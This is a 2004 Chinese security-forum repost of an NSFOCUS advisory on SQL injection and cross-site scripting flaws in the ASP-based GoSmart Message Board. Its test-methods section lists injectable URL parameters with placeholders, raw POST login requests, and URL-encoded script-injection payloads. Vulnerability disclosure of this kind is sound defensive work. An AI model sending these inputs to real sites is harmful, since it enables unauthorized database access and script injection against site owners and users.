[转载]GoSmart Message Board远程SQL注入和跨站脚本漏洞及利用方法

冰血封情

老林

团队决策人

Rank: 9 Rank: 9 Rank: 9

E.S.T运营责任人

帖子: 6819
精华: 834
积分: 36070
阅读权限: 255
性别: 男
来自: 中国
在线时间: 585 小时
注册时间: 2004-6-25
最后登录: 2008-8-28

优秀管理奖资料收集奖原创技术奖核心建议奖

发短消息
加为好友
当前离线

楼主大中小发表于 2004-10-14 13:10 只看该作者

[转载]GoSmart Message Board远程SQL注入和跨站脚本漏洞及利用方法

信息来源:nsfocus

受影响系统：

Go Smart Inc. GoSmart Message Board

描述：GoSmart Message Board是一款基于ASP的论坛程序。

GoSmart Message Board对用户提交的URI数据缺少充分过滤，远程攻击者可以利用这个漏洞获得敏感信息或更改数据库。

问题如下：

1、SQL注入问题，Forum.asp，Login_Exec.asp对用户提交的参数缺少充分过滤，可导致发生SQL注入问题，可能泄露敏感信息或者数据库被更改。

2、Forum.asp，ReplyToQuestion.asp对用户提交的HTML数据缺少正确过滤，构建恶意HTML文件，诱使用户访问，可导致敏感信息泄露。

<*来源：Alexander Antipov （pk95@yandex.ru）

链接：http://marc.theaimsgroup.com/?l= ... 51522823011&w=2
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
Alexander Antipov （pk95@yandex.ru）提供了如下测试方法：

SQL注入问题：

messageboard/Forum.asp?QuestionNumber=[SQL CODE HERE]&Find=1&Category=1

messageboard/Forum.asp?Username=&Category=[SQL CODE HERE]

messageboard/Forum.asp?QuestionNumber=[SQL CODE HERE]&Find=1

messageboard/Forum.asp?Category=[SQL CODE HERE]

POST /messageboard/Login_Exec.asp HTTP/1.1
Host: www.gosmart4u.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

Username=[SQL CODE HERE]&Password=1&Login=1

POST /messageboard/Login_Exec.asp HTTP/1.1
Host: www.gosmart4u.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

Username=1&Password=[SQL CODE HERE]&Login=1

跨站脚本问题：

/messageboard/Forum.asp?QuestionNumber=1&Find=1&Category=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E%3C%22

/messageboard/ReplyToQuestion.asp?MainMessageID=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E%3C%22

TOP

‹‹ 上一主题 | 下一主题 ››